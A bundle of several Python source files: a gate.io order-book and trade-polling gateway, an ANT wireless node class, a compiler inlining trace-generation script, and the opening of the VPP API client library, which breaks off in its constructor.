from datetime import datetime
import time
import threading
class ExchGwApiGateio(RESTfulApiSocket):
    """
    Exchange gateway RESTfulApi for gate.io public market data.

    The get_*_field_name class methods describe where fields live in the
    JSON payloads; get_order_book/get_trades fetch and parse snapshots.
    """
    def __init__(self):
        RESTfulApiSocket.__init__(self)

    @classmethod
    def get_timestamp_offset(cls):
        # Trade timestamps arrive in seconds, so the divisor is 1.
        return 1

    @classmethod
    def get_trades_timestamp_field_name(cls):
        return 'timestamp'

    @classmethod
    def get_bids_field_name(cls):
        return 'bids'

    @classmethod
    def get_asks_field_name(cls):
        return 'asks'

    @classmethod
    def get_trade_side_field_name(cls):
        return 'type'

    @classmethod
    def get_trade_id_field_name(cls):
        return 'tradeID'

    @classmethod
    def get_trade_price_field_name(cls):
        return 'rate'

    @classmethod
    def get_trade_volume_field_name(cls):
        return 'amount'

    @classmethod
    def get_order_book_link(cls, instmt):
        # REST endpoint returning the current order book for the instrument.
        return "http://data.gate.io/api2/1/orderBook/%s" % instmt.get_instmt_code()

    @classmethod
    def get_trades_link(cls, instmt):
        # REST endpoint returning the recent trade history for the instrument.
        return "http://data.gate.io/api2/1/tradeHistory/%s" % \
               (instmt.get_instmt_code())

    @classmethod
    def parse_l2_depth(cls, instmt, raw):
        """
        Parse raw data to L2 depth
        :param instmt: Instrument
        :param raw: Raw data in JSON
        :return: L2Depth with up to 5 levels per side
        :raises Exception: if the payload lacks the bid/ask keys
        """
        l2_depth = L2Depth()
        keys = list(raw.keys())
        if cls.get_bids_field_name() in keys and \
           cls.get_asks_field_name() in keys:
            # No Date time information, has update id only
            l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
            # Bids: best (highest) price first.
            bids = raw[cls.get_bids_field_name()]
            bids = sorted(bids, key=lambda x: x[0], reverse=True)
            max_bid_len = min(len(bids), 5)
            for i in range(0, max_bid_len):
                l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
                l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
            # Asks: best (lowest) price first.
            asks = raw[cls.get_asks_field_name()]
            asks = sorted(asks, key=lambda x: x[0])
            max_ask_len = min(len(asks), 5)
            for i in range(0, max_ask_len):
                l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
                l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
        else:
            raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
                (instmt.get_exchange_name(), instmt.get_instmt_name(), \
                 raw))
        return l2_depth

    @classmethod
    def parse_trade(cls, instmt, raw):
        """
        Parse raw data to a Trade.
        :param instmt: Instrument
        :param raw: Raw data in JSON
        :return: Trade
        :raises Exception: if the payload lacks the expected trade keys
        """
        trade = Trade()
        keys = list(raw.keys())
        if cls.get_trades_timestamp_field_name() in keys and \
           cls.get_trade_id_field_name() in keys and \
           cls.get_trade_price_field_name() in keys and \
           cls.get_trade_volume_field_name() in keys:
            # Date time (epoch seconds -> formatted UTC string).
            date_time = float(raw[cls.get_trades_timestamp_field_name()])
            date_time = date_time / cls.get_timestamp_offset()
            trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
            # Trade side
            trade.trade_side = Trade.parse_side(str(raw[cls.get_trade_side_field_name()]))
            # Trade id
            trade.trade_id = str(raw[cls.get_trade_id_field_name()])
            # Trade price
            trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
            # Trade volume
            trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
        else:
            raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
                (instmt.get_exchange_name(), instmt.get_instmt_name(), \
                 raw))
        return trade

    @classmethod
    def get_order_book(cls, instmt):
        """
        Get order book
        :param instmt: Instrument
        :return: Object L2Depth, or None when the request fails
        """
        # If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
        res = cls.request(cls.get_order_book_link(instmt), verify_cert=False)
        if res:
            return cls.parse_l2_depth(instmt=instmt,
                                      raw=res)
        else:
            return None

    @classmethod
    def get_trades(cls, instmt):
        """
        Get trades
        :param instmt: Instrument
        :return: List of trades (empty when the request fails)
        """
        link = cls.get_trades_link(instmt)
        # If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
        res = cls.request(link, verify_cert=False)
        trades = []
        # BUG FIX: a failed request yields a falsy response; the original
        # indexed res['data'] unconditionally and raised TypeError/KeyError.
        if res and len(res.get('data', [])) > 0:
            for t in res['data']:
                trade = cls.parse_trade(instmt=instmt,
                                        raw=t)
                trades.append(trade)
        return trades
class ExchGwGateio(ExchangeGateway):
    """
    Exchange gateway for gate.io: polls order books and trades on worker
    threads and persists snapshots through the configured database clients.
    """
    def __init__(self, db_clients):
        """
        Constructor
        :param db_clients: Database clients
        """
        ExchangeGateway.__init__(self, ExchGwApiGateio(), db_clients)
    @classmethod
    def get_exchange_name(cls):
        """
        Get exchange name
        :return: Exchange name string
        """
        return 'Gateio'
    def get_order_book_worker(self, instmt):
        """
        Get order book worker: poll the order book forever (every 3s),
        storing each snapshot; errors are logged and retried after 5s.
        :param instmt: Instrument
        """
        while True:
            try:
                l2_depth = self.api_socket.get_order_book(instmt)
                # if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
                if l2_depth:
                    # print(l2_depth)
                    instmt.set_prev_l2_depth(instmt.get_l2_depth())
                    instmt.set_l2_depth(l2_depth)
                    instmt.incr_order_book_id()
                    self.insert_order_book(instmt)
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
                time.sleep(5)
            time.sleep(3)
    def get_trades_worker(self, instmt):
        """
        Get trades worker thread: poll the trade history forever (every 3s),
        inserting only trades newer than the last seen exchange trade id.
        :param instmt: Instrument name
        """
        while True:
            try:
                ret = self.api_socket.get_trades(instmt)
                if ret is None or len(ret) == 0:
                    time.sleep(5)
                    continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                time.sleep(5)
                continue
            for trade in ret:
                # NOTE(review): these asserts are stripped under `python -O`;
                # they validate invariants, not user input.
                assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
                assert isinstance(instmt.get_exch_trade_id(), str), \
                       "instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
                if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
                    # print(trade)
                    instmt.set_exch_trade_id(trade.trade_id)
                    instmt.incr_trade_id()
                    self.insert_trade(instmt, trade)
            # After the first time of getting the trade, indicate the instrument
            # is recovered
            if not instmt.get_recovered():
                instmt.set_recovered(True)
            time.sleep(3)
    def start(self, instmt):
        """
        Start the exchange gateway
        :param instmt: Instrument
        :return List of threads
        """
        instmt.set_l2_depth(L2Depth(5))
        instmt.set_prev_l2_depth(L2Depth(5))
        instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
                                                                                  instmt.get_instmt_name()))
        self.init_instmt_snapshot_table(instmt)
        instmt.set_recovered(False)
        # Only the order-book worker is started; the trades worker is
        # intentionally disabled (kept here commented out).
        t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
        # t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
        t1.start()
        # t2.start()
        return [t1]
        # return [t1, t2]
if __name__ == '__main__':
    # Ad-hoc smoke test: run the order-book worker loop against AE_USDT.
    Logger.init_log()
    exchange_name = 'Gateio'
    instmt_name = 'AEUSDT'
    instmt_code = 'AE_USDT'
    instmt = Instrument(exchange_name, instmt_name, instmt_code)
    db_client = SqlClientTemplate()
    exch = ExchGwGateio([db_client])
    instmt.set_l2_depth(L2Depth(5))
    instmt.set_prev_l2_depth(L2Depth(5))
    instmt.set_recovered(False)
    exch.get_order_book_worker(instmt)
    # NOTE(review): unreachable -- get_order_book_worker() loops forever.
    exch.get_trades_worker(instmt)
node.py | # Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function
import collections
import threading
import logging
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.base.ant import Ant
from ant.base.message import Message
from ant.easy.channel import Channel
from ant.easy.filter import wait_for_event, wait_for_response, wait_for_special
_logger = logging.getLogger("ant.easy.node")
class Node():
    """High-level ANT node.

    Owns the low-level Ant device, runs a worker thread that feeds incoming
    responses/events into queues, and dispatches broadcast/burst data to the
    registered channels from _main().
    """
    def __init__(self):
        # Responses and events each get a deque guarded by a Condition; the
        # wait_for_* helpers block on these until a matching item arrives.
        self._responses_cond = threading.Condition()
        self._responses = collections.deque()
        self._event_cond = threading.Condition()
        self._events = collections.deque()
        # Broadcast/burst payloads flow from the driver callbacks to _main().
        self._datas = queue.Queue()
        self.channels = {}
        self.ant = Ant()
        self._running = True
        self._worker_thread = threading.Thread(target=self._worker, name="ant.easy")
        self._worker_thread.start()
    def new_channel(self, ctype):
        """Allocate the next channel number, assign it type *ctype*, return it."""
        size = len(self.channels)
        channel = Channel(size, self, self.ant)
        self.channels[size] = channel
        channel._assign(ctype, 0x00)
        return channel
    def request_message(self, messageId):
        """Request *messageId* from the device and block until it arrives."""
        _logger.debug("requesting message %#02x", messageId)
        self.ant.request_message(0, messageId)
        _logger.debug("done requesting message %#02x", messageId)
        return self.wait_for_special(messageId)
    def set_network_key(self, network, key):
        """Set the network key and wait for the device acknowledgement."""
        self.ant.set_network_key(network, key)
        return self.wait_for_response(Message.ID.SET_NETWORK_KEY)
    def wait_for_event(self, ok_codes):
        # Block until a channel event with one of *ok_codes* arrives.
        return wait_for_event(ok_codes, self._events, self._event_cond)
    def wait_for_response(self, event_id):
        # Block until a response for *event_id* arrives.
        return wait_for_response(event_id, self._responses, self._responses_cond)
    def wait_for_special(self, event_id):
        # Block until a special (requested) message *event_id* arrives.
        return wait_for_special(event_id, self._responses, self._responses_cond)
    def _worker_response(self, channel, event, data):
        # Driver-thread callback: enqueue the response and wake any waiter.
        self._responses_cond.acquire()
        self._responses.append((channel, event, data))
        self._responses_cond.notify()
        self._responses_cond.release()
    def _worker_event(self, channel, event, data):
        # Driver-thread callback: data events go to the _datas queue for
        # _main(); everything else is a channel event for wait_for_event().
        if event == Message.Code.EVENT_RX_BURST_PACKET:
            self._datas.put(('burst', channel, data))
        elif event == Message.Code.EVENT_RX_BROADCAST:
            self._datas.put(('broadcast', channel, data))
        else:
            self._event_cond.acquire()
            self._events.append((channel, event, data))
            self._event_cond.notify()
            self._event_cond.release()
    def _worker(self):
        # Runs on the worker thread: wire up callbacks and enter the driver loop.
        self.ant.response_function = self._worker_response
        self.ant.channel_event_function = self._worker_event
        # TODO: check capabilities
        self.ant.start()
    def _main(self):
        # Dispatch received data to the owning channel until stop() clears
        # _running; the 1s timeout lets the loop notice the flag.
        while self._running:
            try:
                (data_type, channel, data) = self._datas.get(True, 1.0)
                self._datas.task_done()
                if data_type == 'broadcast':
                    self.channels[channel].on_broadcast_data(data)
                elif data_type == 'burst':
                    self.channels[channel].on_burst_data(data)
                else:
                    _logger.warning("Unknown data type '%s': %r", data_type, data)
            except queue.Empty as e:
                pass
    def start(self):
        """Run the dispatch loop on the calling thread until stop() is called."""
        self._main()
    def stop(self):
        """Stop the dispatch loop and shut down the device worker thread."""
        if self._running:
            # NOTE(review): "Stoping" typo in the log message -- runtime
            # string left untouched here.
            _logger.debug("Stoping ant.easy")
            self._running = False
            self.ant.stop()
            self._worker_thread.join()
|
generate_default_trace.py | # coding=utf-8
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generate initial training data from the behavior of the current heuristic."""
import functools
import os
import queue
import random
from absl import app
from absl import flags
from absl import logging
import tensorflow as tf
from tf_agents.system import system_multiprocessing as multiprocessing
from compiler_opt.rl import inlining_runner
# Command-line flags for the trace-generation pipeline.
flags.DEFINE_string('data_path', None, 'Path to folder containing IR files.')
flags.DEFINE_string('output_path', None, 'Path to the output tfrecord file.')
flags.DEFINE_enum(
    'compile_task', 'inlining', ['inlining'],
    'compile task to generate tfrecord with, only support '
    'inlining currently.')
flags.DEFINE_string('clang_path', 'clang', 'Path to clang binary.')
flags.DEFINE_string('llvm_size_path', 'llvm-size', 'Path to llvm_size binary.')
flags.DEFINE_string('launcher_path', None, 'Path to launcher binary.')
flags.DEFINE_integer(
    'num_workers', None,
    'Number of parallel workers for compilation. `None` for maximum available.')
flags.DEFINE_float(
    'sampling_rate', 1,
    'Sampling rate of modules, 0.5 means 50% sampling rate that generates data '
    'for half modules.')
FLAGS = flags.FLAGS
def worker(runner, work_queue: queue.Queue, results_queue: queue.Queue):
  """Drain *work_queue*, compiling each item and reporting on *results_queue*.

  Runs until the work queue is empty. Every work item yields exactly one
  (workitem, result) tuple on the results queue; a failed compilation is
  logged and reported with a result of None.

  Args:
    runner: the data collector.
    work_queue: the queue of unprocessed work items.
    results_queue: the queue where results are deposited.
  """
  while True:
    try:
      module_triple = work_queue.get_nowait()
    except queue.Empty:
      return
    try:
      results_queue.put(
          (module_triple, runner.collect_data(module_triple, '', None)))
    except:  # pylint: disable=bare-except
      logging.error('Failed to compile %s.', module_triple)
      results_queue.put((module_triple, None))
def main(_):
  """Compile every module with the current heuristic and write one tfrecord."""
  # Initialize runner and file_suffix according to compile_task.
  if FLAGS.compile_task == 'inlining':
    runner = inlining_runner.InliningRunner(
        clang_path=FLAGS.clang_path, llvm_size_path=FLAGS.llvm_size_path,
        launcher_path=FLAGS.launcher_path)
    file_suffix = ['.bc', '.cmd']
  # NOTE(review): `runner`/`file_suffix` are only bound in the 'inlining'
  # branch; the flag enum currently permits no other value.
  with open(os.path.join(FLAGS.data_path, 'module_paths'), 'r') as f:
    module_paths = [
        os.path.join(FLAGS.data_path, name.rstrip('\n')) for name in f
    ]
  # Sampling if needed.
  if FLAGS.sampling_rate < 1:
    sampled_modules = int(len(module_paths) * FLAGS.sampling_rate)
    module_paths = random.sample(module_paths, k=sampled_modules)
  # sort files by size, to process the large files upfront, hopefully while
  # other smaller files are processed in parallel
  sizes_and_paths = [(os.path.getsize(p + '.bc'), p) for p in module_paths]
  sizes_and_paths.sort(reverse=True)
  sorted_module_paths = [p for _, p in sizes_and_paths]
  file_paths = [
      tuple([p + suffix for suffix in file_suffix]) for p in sorted_module_paths
  ]
  worker_count = (
      min(os.cpu_count(), FLAGS.num_workers)
      if FLAGS.num_workers else os.cpu_count())
  with tf.io.TFRecordWriter(FLAGS.output_path) as file_writer:
    ctx = multiprocessing.get_context()
    m = ctx.Manager()
    results_queue = m.Queue()
    work_queue = m.Queue()
    for path in file_paths:
      work_queue.put(path)
    # One process per worker; all of them drain the shared work queue.
    processes = [
        ctx.Process(
            target=functools.partial(worker, runner, work_queue, results_queue))
        for _ in range(0, worker_count)
    ]
    for p in processes:
      p.start()
    total_successful_examples = 0
    total_work = len(file_paths)
    total_failed_examples = 0
    # Collect exactly one result per work item; None marks a failed compile.
    for _ in range(0, total_work):
      _, record = results_queue.get()
      if record:
        total_successful_examples += 1
        file_writer.write(record[0])
      else:
        total_failed_examples += 1
      logging.log_every_n_seconds(logging.INFO,
                                  '%d success, %d failed out of %d', 10,
                                  total_successful_examples,
                                  total_failed_examples, total_work)
    print('%d of %d modules succeeded.' %
          (total_successful_examples, len(file_paths)))
    for p in processes:
      p.join()
if __name__ == '__main__':
  # data_path/output_path are mandatory; handle_main lets tf_agents set up
  # multiprocessing correctly before running the app.
  flags.mark_flag_as_required('data_path')
  flags.mark_flag_as_required('output_path')
  multiprocessing.handle_main(functools.partial(app.run, main))
|
vpp_papi.py | #!/usr/bin/env python3
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import ipaddress
import sys
import multiprocessing as mp
import os
import queue
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
import time
from . vpp_format import verify_enum_hint
from . vpp_serializer import VPPType, VPPEnumType, VPPEnumFlagType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
# VppTransport may be importable as a standalone module; if it is not, install
# a placeholder class so importing this file still succeeds (the real
# transport class is imported inside VPPApiClient.__init__).
try:
    import VppTransport
except ModuleNotFoundError:

    class V:
        """placeholder for VppTransport as the implementation is dependent on
        VPPAPIClient's initialization values
        """

    VppTransport = V

# Module-level logger; the NullHandler keeps the library silent unless the
# application configures logging itself.
logger = logging.getLogger('vpp_papi')
logger.addHandler(logging.NullHandler())

# Public names exported by this module.
__all__ = ('FuncWrapper', 'VppApiDynamicMethodHolder',
           'VppEnum', 'VppEnumType', 'VppEnumFlag',
           'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
           'VPPApiClient', )
def metaclass(metaclass):
    """Return a class decorator that rebuilds the decorated class using
    *metaclass*, preserving its name, bases and attribute dictionary."""
    @functools.wraps(metaclass)
    def rebuild(cls):
        # Re-create the class through the metaclass' three-argument form.
        return metaclass(cls.__name__, cls.__bases__, dict(cls.__dict__))
    return rebuild
class VppEnumType(type):
    """Metaclass that resolves attribute access into the global VPP type
    registry, exposing the Python enum of a registered VPP type."""
    def __getattr__(cls, name):
        # Look the name up in the registry populated by the serializer;
        # NOTE(review): if the name is unknown, vpp_get_type presumably
        # returns None and this raises AttributeError on .enum — confirm.
        t = vpp_get_type(name)
        return t.enum
@metaclass(VppEnumType)
class VppEnum:
    """Namespace for VPP enums; attribute access is delegated to the global
    type registry via the VppEnumType metaclass."""
    pass
@metaclass(VppEnumType)
class VppEnumFlag:
    """Namespace for VPP flag enums; same registry-backed lookup as VppEnum."""
    pass
def vpp_atexit(vpp_weakref):
    """Clean up VPP connection on shutdown.

    Registered with atexit; *vpp_weakref* is a weak reference to the client,
    so nothing happens if the client was already garbage collected or never
    connected.
    """
    client = vpp_weakref()
    if not (client and client.transport.connected):
        return
    logger.debug('Cleaning up VPP on exit')
    client.disconnect()
def add_convenience_methods():
    """Attach `vapi_af` / `vapi_af_name` convenience properties to
    ipaddress IPv4/IPv6 address objects."""

    def _vapi_af(self):
        # Map the stdlib protocol version onto the VPP address-family enum.
        if self._version == 4:
            return VppEnum.vl_api_address_family_t.ADDRESS_IP4.value
        if self._version == 6:
            return VppEnum.vl_api_address_family_t.ADDRESS_IP6.value
        raise ValueError("Invalid _version.")

    def _vapi_af_name(self):
        # Same mapping, but as the short textual family name.
        if self._version == 4:
            return 'ip4'
        if self._version == 6:
            return 'ip6'
        raise ValueError("Invalid _version.")

    ipaddress._IPAddressBase.vapi_af = property(_vapi_af)
    ipaddress._IPAddressBase.vapi_af_name = property(_vapi_af_name)
class VppApiDynamicMethodHolder:
    """Empty namespace object; _register_functions() attaches one FuncWrapper
    attribute per API message shared by client and server."""
    pass
class FuncWrapper:
    """Thin callable wrapper that mirrors the wrapped function's name and
    docstring (used for the dynamically created API methods)."""

    def __init__(self, func):
        # Mirror the identity attributes so repr()/help() read like the
        # underlying function.
        self.__name__ = func.__name__
        self.__doc__ = func.__doc__
        self._func = func

    def __call__(self, **kwargs):
        # Keyword-only on purpose: API message fields are passed by name.
        return self._func(**kwargs)

    def __repr__(self):
        return '<FuncWrapper(func=<{}({})>)>'.format(self.__name__,
                                                     self.__doc__)
class VPPApiError(Exception):
    """API-level failure, e.g. API definition files cannot be located or the
    client is not connected."""
    pass
class VPPNotImplementedError(NotImplementedError):
    """Raised (and caught during JSON processing) for API messages the
    serializer cannot implement."""
    pass
class VPPIOError(IOError):
    """Transport I/O failure: connect failed, read failed, or an undefined
    reply message was received."""
    pass
class VPPRuntimeError(RuntimeError):
    """Unrecoverable setup failure, e.g. missing API files outside test mode
    or invalid address-family enum hints."""
    pass
class VPPValueError(ValueError):
    """Invalid value: unknown call arguments, unresolved type definitions, or
    missing message definitions."""
    pass
class VPPApiJSONFiles:
    """Locate and parse VPP ``.api.json`` API definition files."""

    @classmethod
    def find_api_dir(cls, dirs):
        """Attempt to find the best directory in which API definition
        files may reside. If the value VPP_API_DIR exists in the environment
        then it is first on the search list. If we're inside a recognized
        location in a VPP source tree (src/scripts and src/vpp-api/python)
        then entries from there to the likely locations in build-root are
        added. Finally the location used by system packages is added.

        :returns: A single directory name, or None if no such directory
            could be found.
        """
        # perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
        # in which case, plot a course to likely places in the src tree
        import __main__ as main
        if hasattr(main, '__file__'):
            # get the path of the calling script
            localdir = os.path.dirname(os.path.realpath(main.__file__))
        else:
            # use cwd if there is no calling script
            localdir = os.getcwd()
        localdir_s = localdir.split(os.path.sep)

        def dmatch(dir):
            """Match dir against right-hand components of the script dir"""
            d = dir.split('/')  # param 'dir' assumes a / separator
            length = len(d)
            return len(localdir_s) > length and localdir_s[-length:] == d

        def sdir(srcdir, variant):
            """Build a path from srcdir to the staged API files of
            'variant' (typically '' or '_debug')"""
            # Since 'core' and 'plugin' files are staged
            # in separate directories, we target the parent dir.
            return os.path.sep.join((
                srcdir,
                'build-root',
                'install-vpp%s-native' % variant,
                'vpp',
                'share',
                'vpp',
                'api',
            ))

        srcdir = None
        if dmatch('src/scripts'):
            srcdir = os.path.sep.join(localdir_s[:-2])
        elif dmatch('src/vpp-api/python'):
            srcdir = os.path.sep.join(localdir_s[:-3])
        elif dmatch('test'):
            # we're apparently running tests
            srcdir = os.path.sep.join(localdir_s[:-1])

        if srcdir:
            # we're in the source tree, try both the debug and release
            # variants.
            dirs.append(sdir(srcdir, '_debug'))
            dirs.append(sdir(srcdir, ''))

        # Test for staged copies of the scripts
        # For these, since we explicitly know if we're running a debug versus
        # release variant, target only the relevant directory
        if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
            srcdir = os.path.sep.join(localdir_s[:-4])
            dirs.append(sdir(srcdir, '_debug'))
        if dmatch('build-root/install-vpp-native/vpp/bin'):
            srcdir = os.path.sep.join(localdir_s[:-4])
            dirs.append(sdir(srcdir, ''))

        # finally, try the location system packages typically install into
        dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))

        # check the directories for existence; first one wins
        for dir in dirs:
            if os.path.isdir(dir):
                return dir
        return None

    @classmethod
    def find_api_files(cls, api_dir=None, patterns='*'):  # -> list
        """Find API definition files from the given directory tree with the
        given pattern. If no directory is given then find_api_dir() is used
        to locate one. If no pattern is given then all definition files found
        in the directory tree are used.

        :param api_dir: A directory tree in which to locate API definition
            files; subdirectories are descended into.
            If this is None then find_api_dir() is called to discover it.
        :param patterns: A list of patterns to use in each visited directory
            when looking for files.
            This can be a list/tuple object or a comma-separated string of
            patterns. Each value in the list will have leading/trialing
            whitespace stripped.
            The pattern specifies the first part of the filename, '.api.json'
            is appended.
            The results are de-duplicated, thus overlapping patterns are fine.
            If this is None it defaults to '*' meaning "all API files".
        :returns: A list of file paths for the API files found.
        :raises VPPApiError: if no API directory can be located.
        """
        if api_dir is None:
            api_dir = cls.find_api_dir([])
            if api_dir is None:
                raise VPPApiError("api_dir cannot be located")

        if isinstance(patterns, list) or isinstance(patterns, tuple):
            patterns = [p.strip() + '.api.json' for p in patterns]
        else:
            patterns = [p.strip() + '.api.json' for p in patterns.split(",")]

        api_files = []
        for root, dirnames, files in os.walk(api_dir):
            # iterate all given patterns and de-dup the result
            files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
            for filename in files:
                api_files.append(os.path.join(root, filename))

        return api_files

    @classmethod
    def process_json_file(cls, apidef_file):
        """Parse an open .api.json file; returns (messages, services)."""
        api = json.load(apidef_file)
        return cls._process_json(api)

    @classmethod
    def process_json_str(cls, json_str):
        """Parse a .api.json document given as a string."""
        api = json.loads(json_str)
        return cls._process_json(api)

    @staticmethod
    def _process_json(api):  # -> Tuple[Dict, Dict]
        """Register all type definitions found in *api* and build the
        message/service tables.

        :param api: dict parsed from a .api.json document.
        :returns: (messages, services) where messages maps message name to
            VPPMessage and services is the raw 'services' mapping.
        :raises VPPValueError: if type definitions remain unresolved after
            several passes.
        """
        types = {}
        services = {}
        messages = {}
        try:
            for t in api['enums']:
                t[0] = 'vl_api_' + t[0] + '_t'
                types[t[0]] = {'type': 'enum', 'data': t}
        except KeyError:
            pass
        try:
            for t in api['enumflags']:
                t[0] = 'vl_api_' + t[0] + '_t'
                # Fixed: tag these as 'enumflag'. They were previously tagged
                # 'enum', so the 'enumflag' branch of the resolution loop
                # below was dead code and flag enums were registered as plain
                # VPPEnumType instead of VPPEnumFlagType.
                types[t[0]] = {'type': 'enumflag', 'data': t}
        except KeyError:
            pass
        try:
            for t in api['unions']:
                t[0] = 'vl_api_' + t[0] + '_t'
                types[t[0]] = {'type': 'union', 'data': t}
        except KeyError:
            pass
        try:
            for t in api['types']:
                t[0] = 'vl_api_' + t[0] + '_t'
                types[t[0]] = {'type': 'type', 'data': t}
        except KeyError:
            pass
        try:
            for t, v in api['aliases'].items():
                types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
        except KeyError:
            pass
        try:
            services.update(api['services'])
        except KeyError:
            pass

        # Types can reference each other, so repeatedly try to construct
        # them, carrying unresolved ones over to the next pass (bounded).
        i = 0
        while True:
            unresolved = {}
            for k, v in types.items():
                t = v['data']
                if vpp_get_type(k):
                    # Already registered, possibly by an earlier pass.
                    continue
                if v['type'] == 'enum':
                    try:
                        VPPEnumType(t[0], t[1:])
                    except ValueError:
                        unresolved[k] = v
                elif v['type'] == 'enumflag':
                    try:
                        VPPEnumFlagType(t[0], t[1:])
                    except ValueError:
                        unresolved[k] = v
                elif v['type'] == 'union':
                    try:
                        VPPUnionType(t[0], t[1:])
                    except ValueError:
                        unresolved[k] = v
                elif v['type'] == 'type':
                    try:
                        VPPType(t[0], t[1:])
                    except ValueError:
                        unresolved[k] = v
                elif v['type'] == 'alias':
                    try:
                        VPPTypeAlias(k, t)
                    except ValueError:
                        unresolved[k] = v
            if len(unresolved) == 0:
                break
            if i > 3:
                raise VPPValueError('Unresolved type definitions {}'
                                    .format(unresolved))
            types = unresolved
            i += 1

        try:
            for m in api['messages']:
                try:
                    messages[m[0]] = VPPMessage(m[0], m[1:])
                except VPPNotImplementedError:
                    ### OLE FIXME
                    logger.error('Not implemented error for {}'.format(m[0]))
        except KeyError:
            pass
        return messages, services
class VPPApiClient:
    """VPP interface.

    This class provides the APIs to VPP. The APIs are loaded
    from provided .api.json files and makes functions accordingly.
    These functions are documented in the VPP .api files, as they
    are dynamically created.

    Additionally, VPP can send callback messages; this class
    provides a means to register a callback function to receive
    these messages in a background thread.
    """
    # Default directory searched for .api.json files; None means auto-detect
    # via VPPApiJSONFiles.find_api_files().
    apidir = None
    # Re-export the exception types so callers can catch them via the class.
    VPPApiError = VPPApiError
    VPPRuntimeError = VPPRuntimeError
    VPPValueError = VPPValueError
    VPPNotImplementedError = VPPNotImplementedError
    VPPIOError = VPPIOError

    def __init__(self, *, apifiles=None, testmode=False, async_thread=True,
                 logger=None, loglevel=None,
                 read_timeout=5, use_socket=True,
                 server_address='/run/vpp/api.sock'):
        """Create a VPP API object.

        apifiles is a list of files containing API
        descriptions that will be loaded - methods will be
        dynamically created reflecting these APIs. If not
        provided this will load the API files from VPP's
        default install location.

        logger, if supplied, is the logging logger object to log to.
        loglevel, if supplied, is the log level this logger is set
        to report at (from the loglevels in the logging module).
        """
        if logger is None:
            logger = logging.getLogger(
                "{}.{}".format(__name__, self.__class__.__name__))
            if loglevel is not None:
                logger.setLevel(loglevel)
        self.logger = logger

        self.messages = {}   # message name -> VPPMessage
        self.services = {}   # message name -> service description
        self.id_names = []   # message table index -> message name
        self.id_msgdef = []  # message table index -> VPPMessage
        # Common header prepended to every message.
        self.header = VPPType('header', [['u16', 'msgid'],
                                         ['u32', 'client_index']])
        self.apifiles = []
        self.event_callback = None
        self.message_queue = queue.Queue()
        self.read_timeout = read_timeout
        self.async_thread = async_thread
        self.event_thread = None
